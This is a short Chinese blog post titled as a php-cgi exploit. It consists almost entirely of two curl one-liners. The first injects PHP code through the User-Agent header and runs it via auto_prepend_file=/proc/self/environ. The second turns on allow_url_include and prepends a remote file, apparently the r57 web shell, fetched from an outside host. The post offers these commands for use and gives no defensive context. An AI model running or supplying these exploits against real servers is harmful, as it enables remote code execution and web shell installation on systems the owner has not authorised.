php-cgi漏洞利用EXP
1、本地包含直接执行代码:
curl -H "USER-AGENT: <?system('id');die();?>" https://www.webshell.cc/test.php?-dauto_prepend_file%3d/proc/self/environ+-n
2、远程包含执行代码:
curl https://www.webshell.cc/test.php?-dallow_url_include%3don+-dauto_prepend_file%3dhttps://www.webshell.cc/r57.txt
转载请注明来自WebShell'S Blog,本文地址:https://www.webshell.cc/3599.html
